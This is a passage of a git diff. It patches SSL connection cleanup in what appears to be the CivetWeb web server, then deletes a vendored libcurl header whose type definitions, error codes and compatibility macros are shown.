+  * https://www.openssl.org/docs/man1.1.0/ssl/SSL_set_info_callback.html
+  * https://linux.die.net/man/3/ssl_set_info_callback */
+ static void
+-ssl_info_callback(SSL *ssl, int what, int ret)
++ssl_info_callback(const SSL *ssl, int what, int ret)
+ {
+ 	(void)ret;
+ 
+@@ -16237,10 +16237,13 @@ worker_thread_run(struct worker_thread_args *thread_args)
+ 					mg_free(conn->request_info.client_cert);
+ 					conn->request_info.client_cert = 0;
+ 				}
+-			}
++			} else {
++        /* make sure the connection is cleaned up on SSL failure */
++        close_connection(conn);
++      }
+ #endif
+-		} else {
+-			/* process HTTP connection */
++    } else {
++      /* process HTTP connection */
+ 			process_new_connection(conn);
+ 		}
+ 
+@@ -17249,7 +17252,6 @@ mg_get_system_info_impl(char *buffer, int buflen)
+ #pragma GCC diagnostic push
+ /* Disable bogus compiler warning -Wdate-time */
+ #pragma GCC diagnostic ignored "-Wall"
+-#pragma GCC diagnostic ignored "-Werror"
+ #endif
+ 		mg_snprintf(NULL,
+ 		            NULL,
diff --git a/thirdparty/curl/include/curl/curl.h b/thirdparty/curl/include/curl/curl.h
deleted file mode 100644
index fa019ec..0000000
--- a/thirdparty/curl/include/curl/curl.h
+++ /dev/null
@@ -1,2774 +0,0 @@
-#ifndef __CURL_CURL_H
-#define __CURL_CURL_H
-/***************************************************************************
- *                                  _   _ ____  _
- *  Project                     ___| | | |  _ \| |
- *                             / __| | | | |_) | |
- *                            | (__| |_| |  _ <| |___
- *                             \___|\___/|_| \_\_____|
- *
- * Copyright (C) 1998 - 2018, Daniel Stenberg, <daniel@haxx.se>, et al.
- *
- * This software is licensed as described in the file COPYING, which
- * you should have received as part of this distribution. The terms
- * are also available at https://curl.haxx.se/docs/copyright.html.
- *
- * You may opt to use, copy, modify, merge, publish, distribute and/or sell
- * copies of the Software, and permit persons to whom the Software is
- * furnished to do so, under the terms of the COPYING file.
- *
- * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
- * KIND, either express or implied.
- *
- ***************************************************************************/
-
-/*
- * If you have libcurl problems, all docs and details are found here:
- *   https://curl.haxx.se/libcurl/
- *
- * curl-library mailing list subscription and unsubscription web interface:
- *   https://cool.haxx.se/mailman/listinfo/curl-library/
- */
-
-#ifdef CURL_NO_OLDIES
-#define CURL_STRICTER
-#endif
-
-#include "curlver.h"         /* libcurl version defines   */
-#include "system.h"          /* determine things run-time */
-
-/*
- * Define WIN32 when build target is Win32 API
- */
-
-#if (defined(_WIN32) || defined(__WIN32__)) && \
-     !defined(WIN32) && !defined(__SYMBIAN32__)
-#define WIN32
-#endif
-
-#include <stdio.h>
-#include <limits.h>
-
-#if defined(__FreeBSD__) && (__FreeBSD__ >= 2)
-/* Needed for __FreeBSD_version symbol definition */
-#include <osreldate.h>
-#endif
-
-/* The include stuff here below is mainly for time_t! */
-#include <sys/types.h>
-#include <time.h>
-
-#if defined(WIN32) && !defined(_WIN32_WCE) && !defined(__CYGWIN__)
-#if !(defined(_WINSOCKAPI_) || defined(_WINSOCK_H) || \
-      defined(__LWIP_OPT_H__) || defined(LWIP_HDR_OPT_H))
-/* The check above prevents the winsock2 inclusion if winsock.h already was
-   included, since they can't co-exist without problems */
-#include <winsock2.h>
-#include <ws2tcpip.h>
-#endif
-#endif
-
-/* HP-UX systems version 9, 10 and 11 lack sys/select.h and so does oldish
-   libc5-based Linux systems. Only include it on systems that are known to
-   require it! */
-#if defined(_AIX) || defined(__NOVELL_LIBC__) || defined(__NetBSD__) || \
-    defined(__minix) || defined(__SYMBIAN32__) || defined(__INTEGRITY) || \
-    defined(ANDROID) || defined(__ANDROID__) || defined(__OpenBSD__) || \
-    defined(__CYGWIN__) || \
-   (defined(__FreeBSD_version) && (__FreeBSD_version < 800000))
-#include <sys/select.h>
-#endif
-
-#if !defined(WIN32) && !defined(_WIN32_WCE)
-#include <sys/socket.h>
-#endif
-
-#if !defined(WIN32) && !defined(__WATCOMC__) && !defined(__VXWORKS__)
-#include <sys/time.h>
-#endif
-
-#ifdef __BEOS__
-#include <support/SupportDefs.h>
-#endif
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#if defined(BUILDING_LIBCURL) || defined(CURL_STRICTER)
-typedef struct Curl_easy CURL;
-typedef struct Curl_share CURLSH;
-#else
-typedef void CURL;
-typedef void CURLSH;
-#endif
-
-/*
- * libcurl external API function linkage decorations.
- */
-
-#ifdef CURL_STATICLIB
-#  define CURL_EXTERN
-#elif defined(WIN32) || defined(_WIN32) || defined(__SYMBIAN32__)
-#  if defined(BUILDING_LIBCURL)
-#    define CURL_EXTERN  __declspec(dllexport)
-#  else
-#    define CURL_EXTERN  __declspec(dllimport)
-#  endif
-#elif defined(BUILDING_LIBCURL) && defined(CURL_HIDDEN_SYMBOLS)
-#  define CURL_EXTERN CURL_EXTERN_SYMBOL
-#else
-#  define CURL_EXTERN
-#endif
-
-#ifndef curl_socket_typedef
-/* socket typedef */
-#if defined(WIN32) && !defined(__LWIP_OPT_H__) && !defined(LWIP_HDR_OPT_H)
-typedef SOCKET curl_socket_t;
-#define CURL_SOCKET_BAD INVALID_SOCKET
-#else
-typedef int curl_socket_t;
-#define CURL_SOCKET_BAD -1
-#endif
-#define curl_socket_typedef
-#endif /* curl_socket_typedef */
-
-/* enum for the different supported SSL backends */
-typedef enum {
-  CURLSSLBACKEND_NONE = 0,
-  CURLSSLBACKEND_OPENSSL = 1,
-  CURLSSLBACKEND_GNUTLS = 2,
-  CURLSSLBACKEND_NSS = 3,
-  CURLSSLBACKEND_OBSOLETE4 = 4,  /* Was QSOSSL. */
-  CURLSSLBACKEND_GSKIT = 5,
-  CURLSSLBACKEND_POLARSSL = 6,
-  CURLSSLBACKEND_WOLFSSL = 7,
-  CURLSSLBACKEND_SCHANNEL = 8,
-  CURLSSLBACKEND_DARWINSSL = 9,
-  CURLSSLBACKEND_AXTLS = 10,
-  CURLSSLBACKEND_MBEDTLS = 11
-} curl_sslbackend;
-
-/* aliases for library clones and renames */
-#define CURLSSLBACKEND_LIBRESSL CURLSSLBACKEND_OPENSSL
-#define CURLSSLBACKEND_BORINGSSL CURLSSLBACKEND_OPENSSL
-#define CURLSSLBACKEND_CYASSL CURLSSLBACKEND_WOLFSSL
-
-struct curl_httppost {
-  struct curl_httppost *next;       /* next entry in the list */
-  char *name;                       /* pointer to allocated name */
-  long namelength;                  /* length of name length */
-  char *contents;                   /* pointer to allocated data contents */
-  long contentslength;              /* length of contents field, see also
-                                       CURL_HTTPPOST_LARGE */
-  char *buffer;                     /* pointer to allocated buffer contents */
-  long bufferlength;                /* length of buffer field */
-  char *contenttype;                /* Content-Type */
-  struct curl_slist *contentheader; /* list of extra headers for this form */
-  struct curl_httppost *more;       /* if one field name has more than one
-                                       file, this link should link to following
-                                       files */
-  long flags;                       /* as defined below */
-
-/* specified content is a file name */
-#define CURL_HTTPPOST_FILENAME (1<<0)
-/* specified content is a file name */
-#define CURL_HTTPPOST_READFILE (1<<1)
-/* name is only stored pointer do not free in formfree */
-#define CURL_HTTPPOST_PTRNAME (1<<2)
-/* contents is only stored pointer do not free in formfree */
-#define CURL_HTTPPOST_PTRCONTENTS (1<<3)
-/* upload file from buffer */
-#define CURL_HTTPPOST_BUFFER (1<<4)
-/* upload file from pointer contents */
-#define CURL_HTTPPOST_PTRBUFFER (1<<5)
-/* upload file contents by using the regular read callback to get the data and
-   pass the given pointer as custom pointer */
-#define CURL_HTTPPOST_CALLBACK (1<<6)
-/* use size in 'contentlen', added in 7.46.0 */
-#define CURL_HTTPPOST_LARGE (1<<7)
-
-  char *showfilename;               /* The file name to show. If not set, the
-                                       actual file name will be used (if this
-                                       is a file part) */
-  void *userp;                      /* custom pointer used for
-                                       HTTPPOST_CALLBACK posts */
-  curl_off_t contentlen;            /* alternative length of contents
-                                       field. Used if CURL_HTTPPOST_LARGE is
-                                       set. Added in 7.46.0 */
-};
-
-/* This is the CURLOPT_PROGRESSFUNCTION callback proto. It is now considered
-   deprecated but was the only choice up until 7.31.0 */
-typedef int (*curl_progress_callback)(void *clientp,
-                                      double dltotal,
-                                      double dlnow,
-                                      double ultotal,
-                                      double ulnow);
-
-/* This is the CURLOPT_XFERINFOFUNCTION callback proto. It was introduced in
-   7.32.0, it avoids floating point and provides more detailed information. */
-typedef int (*curl_xferinfo_callback)(void *clientp,
-                                      curl_off_t dltotal,
-                                      curl_off_t dlnow,
-                                      curl_off_t ultotal,
-                                      curl_off_t ulnow);
-
-#ifndef CURL_MAX_READ_SIZE
-  /* The maximum receive buffer size configurable via CURLOPT_BUFFERSIZE. */
-#define CURL_MAX_READ_SIZE 524288
-#endif
-
-#ifndef CURL_MAX_WRITE_SIZE
-  /* Tests have proven that 20K is a very bad buffer size for uploads on
-     Windows, while 16K for some odd reason performed a lot better.
-     We do the ifndef check to allow this value to easier be changed at build
-     time for those who feel adventurous. The practical minimum is about
-     400 bytes since libcurl uses a buffer of this size as a scratch area
-     (unrelated to network send operations). */
-#define CURL_MAX_WRITE_SIZE 16384
-#endif
-
-#ifndef CURL_MAX_HTTP_HEADER
-/* The only reason to have a max limit for this is to avoid the risk of a bad
-   server feeding libcurl with a never-ending header that will cause reallocs
-   infinitely */
-#define CURL_MAX_HTTP_HEADER (100*1024)
-#endif
-
-/* This is a magic return code for the write callback that, when returned,
-   will signal libcurl to pause receiving on the current transfer. */
-#define CURL_WRITEFUNC_PAUSE 0x10000001
-
-typedef size_t (*curl_write_callback)(char *buffer,
-                                      size_t size,
-                                      size_t nitems,
-                                      void *outstream);
-
-/* This callback will be called when a new resolver request is made */
-typedef int (*curl_resolver_start_callback)(void *resolver_state,
-                                            void *reserved, void *userdata);
-
-/* enumeration of file types */
-typedef enum {
-  CURLFILETYPE_FILE = 0,
-  CURLFILETYPE_DIRECTORY,
-  CURLFILETYPE_SYMLINK,
-  CURLFILETYPE_DEVICE_BLOCK,
-  CURLFILETYPE_DEVICE_CHAR,
-  CURLFILETYPE_NAMEDPIPE,
-  CURLFILETYPE_SOCKET,
-  CURLFILETYPE_DOOR, /* is possible only on Sun Solaris now */
-
-  CURLFILETYPE_UNKNOWN /* should never occur */
-} curlfiletype;
-
-#define CURLFINFOFLAG_KNOWN_FILENAME    (1<<0)
-#define CURLFINFOFLAG_KNOWN_FILETYPE    (1<<1)
-#define CURLFINFOFLAG_KNOWN_TIME        (1<<2)
-#define CURLFINFOFLAG_KNOWN_PERM        (1<<3)
-#define CURLFINFOFLAG_KNOWN_UID         (1<<4)
-#define CURLFINFOFLAG_KNOWN_GID         (1<<5)
-#define CURLFINFOFLAG_KNOWN_SIZE        (1<<6)
-#define CURLFINFOFLAG_KNOWN_HLINKCOUNT  (1<<7)
-
-/* Content of this structure depends on information which is known and is
-   achievable (e.g. by FTP LIST parsing). Please see the url_easy_setopt(3) man
-   page for callbacks returning this structure -- some fields are mandatory,
-   some others are optional. The FLAG field has special meaning. */
-struct curl_fileinfo {
-  char *filename;
-  curlfiletype filetype;
-  time_t time;
-  unsigned int perm;
-  int uid;
-  int gid;
-  curl_off_t size;
-  long int hardlinks;
-
-  struct {
-    /* If some of these fields is not NULL, it is a pointer to b_data. */
-    char *time;
-    char *perm;
-    char *user;
-    char *group;
-    char *target; /* pointer to the target filename of a symlink */
-  } strings;
-
-  unsigned int flags;
-
-  /* used internally */
-  char *b_data;
-  size_t b_size;
-  size_t b_used;
-};
-
-/* return codes for CURLOPT_CHUNK_BGN_FUNCTION */
-#define CURL_CHUNK_BGN_FUNC_OK      0
-#define CURL_CHUNK_BGN_FUNC_FAIL    1 /* tell the lib to end the task */
-#define CURL_CHUNK_BGN_FUNC_SKIP    2 /* skip this chunk over */
-
-/* if splitting of data transfer is enabled, this callback is called before
-   download of an individual chunk started. Note that parameter "remains" works
-   only for FTP wildcard downloading (for now), otherwise is not used */
-typedef long (*curl_chunk_bgn_callback)(const void *transfer_info,
-                                        void *ptr,
-                                        int remains);
-
-/* return codes for CURLOPT_CHUNK_END_FUNCTION */
-#define CURL_CHUNK_END_FUNC_OK      0
-#define CURL_CHUNK_END_FUNC_FAIL    1 /* tell the lib to end the task */
-
-/* If splitting of data transfer is enabled this callback is called after
-   download of an individual chunk finished.
-   Note! After this callback was set then it have to be called FOR ALL chunks.
-   Even if downloading of this chunk was skipped in CHUNK_BGN_FUNC.
-   This is the reason why we don't need "transfer_info" parameter in this
-   callback and we are not interested in "remains" parameter too. */
-typedef long (*curl_chunk_end_callback)(void *ptr);
-
-/* return codes for FNMATCHFUNCTION */
-#define CURL_FNMATCHFUNC_MATCH    0 /* string corresponds to the pattern */
-#define CURL_FNMATCHFUNC_NOMATCH  1 /* pattern doesn't match the string */
-#define CURL_FNMATCHFUNC_FAIL     2 /* an error occurred */
-
-/* callback type for wildcard downloading pattern matching. If the
-   string matches the pattern, return CURL_FNMATCHFUNC_MATCH value, etc. */
-typedef int (*curl_fnmatch_callback)(void *ptr,
-                                     const char *pattern,
-                                     const char *string);
-
-/* These are the return codes for the seek callbacks */
-#define CURL_SEEKFUNC_OK       0
-#define CURL_SEEKFUNC_FAIL     1 /* fail the entire transfer */
-#define CURL_SEEKFUNC_CANTSEEK 2 /* tell libcurl seeking can't be done, so
-                                    libcurl might try other means instead */
-typedef int (*curl_seek_callback)(void *instream,
-                                  curl_off_t offset,
-                                  int origin); /* 'whence' */
-
-/* This is a return code for the read callback that, when returned, will
-   signal libcurl to immediately abort the current transfer. */
-#define CURL_READFUNC_ABORT 0x10000000
-/* This is a return code for the read callback that, when returned, will
-   signal libcurl to pause sending data on the current transfer. */
-#define CURL_READFUNC_PAUSE 0x10000001
-
-typedef size_t (*curl_read_callback)(char *buffer,
-                                      size_t size,
-                                      size_t nitems,
-                                      void *instream);
-
-typedef enum {
-  CURLSOCKTYPE_IPCXN,  /* socket created for a specific IP connection */
-  CURLSOCKTYPE_ACCEPT, /* socket created by accept() call */
-  CURLSOCKTYPE_LAST    /* never use */
-} curlsocktype;
-
-/* The return code from the sockopt_callback can signal information back
-   to libcurl: */
-#define CURL_SOCKOPT_OK 0
-#define CURL_SOCKOPT_ERROR 1 /* causes libcurl to abort and return
-                                CURLE_ABORTED_BY_CALLBACK */
-#define CURL_SOCKOPT_ALREADY_CONNECTED 2
-
-typedef int (*curl_sockopt_callback)(void *clientp,
-                                     curl_socket_t curlfd,
-                                     curlsocktype purpose);
-
-struct curl_sockaddr {
-  int family;
-  int socktype;
-  int protocol;
-  unsigned int addrlen; /* addrlen was a socklen_t type before 7.18.0 but it
-                           turned really ugly and painful on the systems that
-                           lack this type */
-  struct sockaddr addr;
-};
-
-typedef curl_socket_t
-(*curl_opensocket_callback)(void *clientp,
-                            curlsocktype purpose,
-                            struct curl_sockaddr *address);
-
-typedef int
-(*curl_closesocket_callback)(void *clientp, curl_socket_t item);
-
-typedef enum {
-  CURLIOE_OK,            /* I/O operation successful */
-  CURLIOE_UNKNOWNCMD,    /* command was unknown to callback */
-  CURLIOE_FAILRESTART,   /* failed to restart the read */
-  CURLIOE_LAST           /* never use */
-} curlioerr;
-
-typedef enum {
-  CURLIOCMD_NOP,         /* no operation */
-  CURLIOCMD_RESTARTREAD, /* restart the read stream from start */
-  CURLIOCMD_LAST         /* never use */
-} curliocmd;
-
-typedef curlioerr (*curl_ioctl_callback)(CURL *handle,
-                                         int cmd,
-                                         void *clientp);
-
-#ifndef CURL_DID_MEMORY_FUNC_TYPEDEFS
-/*
- * The following typedef's are signatures of malloc, free, realloc, strdup and
- * calloc respectively.  Function pointers of these types can be passed to the
- * curl_global_init_mem() function to set user defined memory management
- * callback routines.
- */
-typedef void *(*curl_malloc_callback)(size_t size);
-typedef void (*curl_free_callback)(void *ptr);
-typedef void *(*curl_realloc_callback)(void *ptr, size_t size);
-typedef char *(*curl_strdup_callback)(const char *str);
-typedef void *(*curl_calloc_callback)(size_t nmemb, size_t size);
-
-#define CURL_DID_MEMORY_FUNC_TYPEDEFS
-#endif
-
-/* the kind of data that is passed to information_callback*/
-typedef enum {
-  CURLINFO_TEXT = 0,
-  CURLINFO_HEADER_IN,    /* 1 */
-  CURLINFO_HEADER_OUT,   /* 2 */
-  CURLINFO_DATA_IN,      /* 3 */
-  CURLINFO_DATA_OUT,     /* 4 */
-  CURLINFO_SSL_DATA_IN,  /* 5 */
-  CURLINFO_SSL_DATA_OUT, /* 6 */
-  CURLINFO_END
-} curl_infotype;
-
-typedef int (*curl_debug_callback)
-       (CURL *handle,      /* the handle/transfer this concerns */
-        curl_infotype type, /* what kind of data */
-        char *data,        /* points to the data */
-        size_t size,       /* size of the data pointed to */
-        void *userptr);    /* whatever the user please */
-
-/* All possible error codes from all sorts of curl functions. Future versions
-   may return other values, stay prepared.
-
-   Always add new return codes last. Never *EVER* remove any. The return
-   codes must remain the same!
- */
-
-typedef enum {
-  CURLE_OK = 0,
-  CURLE_UNSUPPORTED_PROTOCOL,    /* 1 */
-  CURLE_FAILED_INIT,             /* 2 */
-  CURLE_URL_MALFORMAT,           /* 3 */
-  CURLE_NOT_BUILT_IN,            /* 4 - [was obsoleted in August 2007 for
-                                    7.17.0, reused in April 2011 for 7.21.5] */
-  CURLE_COULDNT_RESOLVE_PROXY,   /* 5 */
-  CURLE_COULDNT_RESOLVE_HOST,    /* 6 */
-  CURLE_COULDNT_CONNECT,         /* 7 */
-  CURLE_WEIRD_SERVER_REPLY,      /* 8 */
-  CURLE_REMOTE_ACCESS_DENIED,    /* 9 a service was denied by the server
-                                    due to lack of access - when login fails
-                                    this is not returned. */
-  CURLE_FTP_ACCEPT_FAILED,       /* 10 - [was obsoleted in April 2006 for
-                                    7.15.4, reused in Dec 2011 for 7.24.0]*/
-  CURLE_FTP_WEIRD_PASS_REPLY,    /* 11 */
-  CURLE_FTP_ACCEPT_TIMEOUT,      /* 12 - timeout occurred accepting server
-                                    [was obsoleted in August 2007 for 7.17.0,
-                                    reused in Dec 2011 for 7.24.0]*/
-  CURLE_FTP_WEIRD_PASV_REPLY,    /* 13 */
-  CURLE_FTP_WEIRD_227_FORMAT,    /* 14 */
-  CURLE_FTP_CANT_GET_HOST,       /* 15 */
-  CURLE_HTTP2,                   /* 16 - A problem in the http2 framing layer.
-                                    [was obsoleted in August 2007 for 7.17.0,
-                                    reused in July 2014 for 7.38.0] */
-  CURLE_FTP_COULDNT_SET_TYPE,    /* 17 */
-  CURLE_PARTIAL_FILE,            /* 18 */
-  CURLE_FTP_COULDNT_RETR_FILE,   /* 19 */
-  CURLE_OBSOLETE20,              /* 20 - NOT USED */
-  CURLE_QUOTE_ERROR,             /* 21 - quote command failure */
-  CURLE_HTTP_RETURNED_ERROR,     /* 22 */
-  CURLE_WRITE_ERROR,             /* 23 */
-  CURLE_OBSOLETE24,              /* 24 - NOT USED */
-  CURLE_UPLOAD_FAILED,           /* 25 - failed upload "command" */
-  CURLE_READ_ERROR,              /* 26 - couldn't open/read from file */
-  CURLE_OUT_OF_MEMORY,           /* 27 */
-  /* Note: CURLE_OUT_OF_MEMORY may sometimes indicate a conversion error
-           instead of a memory allocation error if CURL_DOES_CONVERSIONS
-           is defined
-  */
-  CURLE_OPERATION_TIMEDOUT,      /* 28 - the timeout time was reached */
-  CURLE_OBSOLETE29,              /* 29 - NOT USED */
-  CURLE_FTP_PORT_FAILED,         /* 30 - FTP PORT operation failed */
-  CURLE_FTP_COULDNT_USE_REST,    /* 31 - the REST command failed */
-  CURLE_OBSOLETE32,              /* 32 - NOT USED */
-  CURLE_RANGE_ERROR,             /* 33 - RANGE "command" didn't work */
-  CURLE_HTTP_POST_ERROR,         /* 34 */
-  CURLE_SSL_CONNECT_ERROR,       /* 35 - wrong when connecting with SSL */
-  CURLE_BAD_DOWNLOAD_RESUME,     /* 36 - couldn't resume download */
-  CURLE_FILE_COULDNT_READ_FILE,  /* 37 */
-  CURLE_LDAP_CANNOT_BIND,        /* 38 */
-  CURLE_LDAP_SEARCH_FAILED,      /* 39 */
-  CURLE_OBSOLETE40,              /* 40 - NOT USED */
-  CURLE_FUNCTION_NOT_FOUND,      /* 41 - NOT USED starting with 7.53.0 */
-  CURLE_ABORTED_BY_CALLBACK,     /* 42 */
-  CURLE_BAD_FUNCTION_ARGUMENT,   /* 43 */
-  CURLE_OBSOLETE44,              /* 44 - NOT USED */
-  CURLE_INTERFACE_FAILED,        /* 45 - CURLOPT_INTERFACE failed */
-  CURLE_OBSOLETE46,              /* 46 - NOT USED */
-  CURLE_TOO_MANY_REDIRECTS,      /* 47 - catch endless re-direct loops */
-  CURLE_UNKNOWN_OPTION,          /* 48 - User specified an unknown option */
-  CURLE_TELNET_OPTION_SYNTAX,    /* 49 - Malformed telnet option */
-  CURLE_OBSOLETE50,              /* 50 - NOT USED */
-  CURLE_PEER_FAILED_VERIFICATION, /* 51 - peer's certificate or fingerprint
-                                     wasn't verified fine */
-  CURLE_GOT_NOTHING,             /* 52 - when this is a specific error */
-  CURLE_SSL_ENGINE_NOTFOUND,     /* 53 - SSL crypto engine not found */
-  CURLE_SSL_ENGINE_SETFAILED,    /* 54 - can not set SSL crypto engine as
-                                    default */
-  CURLE_SEND_ERROR,              /* 55 - failed sending network data */
-  CURLE_RECV_ERROR,              /* 56 - failure in receiving network data */
-  CURLE_OBSOLETE57,              /* 57 - NOT IN USE */
-  CURLE_SSL_CERTPROBLEM,         /* 58 - problem with the local certificate */
-  CURLE_SSL_CIPHER,              /* 59 - couldn't use specified cipher */
-  CURLE_SSL_CACERT,              /* 60 - problem with the CA cert (path?) */
-  CURLE_BAD_CONTENT_ENCODING,    /* 61 - Unrecognized/bad encoding */
-  CURLE_LDAP_INVALID_URL,        /* 62 - Invalid LDAP URL */
-  CURLE_FILESIZE_EXCEEDED,       /* 63 - Maximum file size exceeded */
-  CURLE_USE_SSL_FAILED,          /* 64 - Requested FTP SSL level failed */
-  CURLE_SEND_FAIL_REWIND,        /* 65 - Sending the data requires a rewind
-                                    that failed */
-  CURLE_SSL_ENGINE_INITFAILED,   /* 66 - failed to initialise ENGINE */
-  CURLE_LOGIN_DENIED,            /* 67 - user, password or similar was not
-                                    accepted and we failed to login */
-  CURLE_TFTP_NOTFOUND,           /* 68 - file not found on server */
-  CURLE_TFTP_PERM,               /* 69 - permission problem on server */
-  CURLE_REMOTE_DISK_FULL,        /* 70 - out of disk space on server */
-  CURLE_TFTP_ILLEGAL,            /* 71 - Illegal TFTP operation */
-  CURLE_TFTP_UNKNOWNID,          /* 72 - Unknown transfer ID */
-  CURLE_REMOTE_FILE_EXISTS,      /* 73 - File already exists */
-  CURLE_TFTP_NOSUCHUSER,         /* 74 - No such user */
-  CURLE_CONV_FAILED,             /* 75 - conversion failed */
-  CURLE_CONV_REQD,               /* 76 - caller must register conversion
-                                    callbacks using curl_easy_setopt options
-                                    CURLOPT_CONV_FROM_NETWORK_FUNCTION,
-                                    CURLOPT_CONV_TO_NETWORK_FUNCTION, and
-                                    CURLOPT_CONV_FROM_UTF8_FUNCTION */
-  CURLE_SSL_CACERT_BADFILE,      /* 77 - could not load CACERT file, missing
-                                    or wrong format */
-  CURLE_REMOTE_FILE_NOT_FOUND,   /* 78 - remote file not found */
-  CURLE_SSH,                     /* 79 - error from the SSH layer, somewhat
-                                    generic so the error message will be of
-                                    interest when this has happened */
-
-  CURLE_SSL_SHUTDOWN_FAILED,     /* 80 - Failed to shut down the SSL
-                                    connection */
-  CURLE_AGAIN,                   /* 81 - socket is not ready for send/recv,
-                                    wait till it's ready and try again (Added
-                                    in 7.18.2) */
-  CURLE_SSL_CRL_BADFILE,         /* 82 - could not load CRL file, missing or
-                                    wrong format (Added in 7.19.0) */
-  CURLE_SSL_ISSUER_ERROR,        /* 83 - Issuer check failed.  (Added in
-                                    7.19.0) */
-  CURLE_FTP_PRET_FAILED,         /* 84 - a PRET command failed */
-  CURLE_RTSP_CSEQ_ERROR,         /* 85 - mismatch of RTSP CSeq numbers */
-  CURLE_RTSP_SESSION_ERROR,      /* 86 - mismatch of RTSP Session Ids */
-  CURLE_FTP_BAD_FILE_LIST,       /* 87 - unable to parse FTP file list */
-  CURLE_CHUNK_FAILED,            /* 88 - chunk callback reported error */
-  CURLE_NO_CONNECTION_AVAILABLE, /* 89 - No connection available, the
-                                    session will be queued */
-  CURLE_SSL_PINNEDPUBKEYNOTMATCH, /* 90 - specified pinned public key did not
-                                     match */
-  CURLE_SSL_INVALIDCERTSTATUS,   /* 91 - invalid certificate status */
-  CURLE_HTTP2_STREAM,            /* 92 - stream error in HTTP/2 framing layer
-                                    */
-  CURLE_RECURSIVE_API_CALL,      /* 93 - an api function was called from
-                                    inside a callback */
-  CURL_LAST /* never use! */
-} CURLcode;
-
-#ifndef CURL_NO_OLDIES /* define this to test if your app builds with all
-                          the obsolete stuff removed! */
-
-/* Previously obsolete error code re-used in 7.38.0 */
-#define CURLE_OBSOLETE16 CURLE_HTTP2
-
-/* Previously obsolete error codes re-used in 7.24.0 */
-#define CURLE_OBSOLETE10 CURLE_FTP_ACCEPT_FAILED
-#define CURLE_OBSOLETE12 CURLE_FTP_ACCEPT_TIMEOUT
-
-/*  compatibility with older names */
-#define CURLOPT_ENCODING CURLOPT_ACCEPT_ENCODING
-#define CURLE_FTP_WEIRD_SERVER_REPLY CURLE_WEIRD_SERVER_REPLY
-
-/* The following were added in 7.21.5, April 2011 */
-#define CURLE_UNKNOWN_TELNET_OPTION CURLE_UNKNOWN_OPTION
-
-/* The following were added in 7.17.1 */
-/* These are scheduled to disappear by 2009 */
-#define CURLE_SSL_PEER_CERTIFICATE CURLE_PEER_FAILED_VERIFICATION
-
-/* The following were added in 7.17.0 */
-/* These are scheduled to disappear by 2009 */
-#define CURLE_OBSOLETE CURLE_OBSOLETE50 /* no one should be using this! */
-#define CURLE_BAD_PASSWORD_ENTERED CURLE_OBSOLETE46
-#define CURLE_BAD_CALLING_ORDER CURLE_OBSOLETE44
-#define CURLE_FTP_USER_PASSWORD_INCORRECT CURLE_OBSOLETE10
-#define CURLE_FTP_CANT_RECONNECT CURLE_OBSOLETE16
-#define CURLE_FTP_COULDNT_GET_SIZE CURLE_OBSOLETE32
-#define CURLE_FTP_COULDNT_SET_ASCII CURLE_OBSOLETE29
-#define CURLE_FTP_WEIRD_USER_REPLY CURLE_OBSOLETE12
-#define CURLE_FTP_WRITE_ERROR CURLE_OBSOLETE20
-#define CURLE_LIBRARY_NOT_FOUND CURLE_OBSOLETE40
-#define CURLE_MALFORMAT_USER CURLE_OBSOLETE24
-#define CURLE_SHARE_IN_USE CURLE_OBSOLETE57
-#define CURLE_URL_MALFORMAT_USER CURLE_NOT_BUILT_IN
-
-#define CURLE_FTP_ACCESS_DENIED CURLE_REMOTE_ACCESS_DENIED
-#define CURLE_FTP_COULDNT_SET_BINARY CURLE_FTP_COULDNT_SET_TYPE
-#define CURLE_FTP_QUOTE_ERROR CURLE_QUOTE_ERROR
-#define CURLE_TFTP_DISKFULL CURLE_REMOTE_DISK_FULL
-#define CURLE_TFTP_EXISTS CURLE_REMOTE_FILE_EXISTS
-#define CURLE_HTTP_RANGE_ERROR CURLE_RANGE_ERROR
-#define CURLE_FTP_SSL_FAILED CURLE_USE_SSL_FAILED
-
-/* The following were added earlier */
-
-#define CURLE_OPERATION_TIMEOUTED CURLE_OPERATION_TIMEDOUT
-
-#define CURLE_HTTP_NOT_FOUND CURLE_HTTP_RETURNED_ERROR
-#define CURLE_HTTP_PORT_FAILED CURLE_INTERFACE_FAILED
-#define CURLE_FTP_COULDNT_STOR_FILE CURLE_UPLOAD_FAILED
-
-#define CURLE_FTP_PARTIAL_FILE CURLE_PARTIAL_FILE
-#define CURLE_FTP_BAD_DOWNLOAD_RESUME CURLE_BAD_DOWNLOAD_RESUME
-
-/* This was the error code 50 in 7.7.3 and a few earlier versions, this
-   is no longer used by libcurl but is instead #defined here only to not
-   make programs break */
-#define CURLE_ALREADY_COMPLETE 99999
-
-/* Provide defines for really old option names */
-#define CURLOPT_FILE CURLOPT_WRITEDATA /* name changed in 7.9.7 */
-#define CURLOPT_INFILE CURLOPT_READDATA /* name changed in 7.9.7 */
-#define CURLOPT_WRITEHEADER CURLOPT_HEADERDATA
-
-/* Since long deprecated options with no code in the lib that does anything
-   with them. */
-#define CURLOPT_WRITEINFO CURLOPT_OBSOLETE40
-#define CURLOPT_CLOSEPOLICY CURLOPT_OBSOLETE72
-
-#endif /*!CURL_NO_OLDIES*/
-
-/* This prototype applies to all conversion callbacks */
-typedef CURLcode (*curl_conv_callback)(char *buffer, size_t length);
-
-typedef CURLcode (*curl_ssl_ctx_callback)(CURL *curl,    /* easy handle */
-                                          void *ssl_ctx, /* actually an
-                                                            OpenSSL SSL_CTX */
-                                          void *userptr);
-
-typedef enum {
-  CURLPROXY_HTTP = 0,   /* added in 7.10, new in 7.19.4 default is to use
-                           CONNECT HTTP/1.1 */
-  CURLPROXY_HTTP_1_0 = 1,   /* added in 7.19.4, force to use CONNECT
-                               HTTP/1.0  */
-  CURLPROXY_HTTPS = 2, /* added in 7.52.0 */
-  CURLPROXY_SOCKS4 = 4, /* support added in 7.15.2, enum existed already
-                           in 7.10 */
-  CURLPROXY_SOCKS5 = 5, /* added in 7.10 */
-  CURLPROXY_SOCKS4A = 6, /* added in 7.18.0 */
-  CURLPROXY_SOCKS5_HOSTNAME = 7 /* Use the SOCKS5 protocol but pass along the
-                                   host name rather than the IP address. added
-                                   in 7.18.0 */
-} curl_proxytype;  /* this enum was added in 7.10 */
-
-/*
- * Bitmasks for CURLOPT_HTTPAUTH and CURLOPT_PROXYAUTH options:
- *
- * CURLAUTH_NONE         - No HTTP authentication
- * CURLAUTH_BASIC        - HTTP Basic authentication (default)
- * CURLAUTH_DIGEST       - HTTP Digest authentication
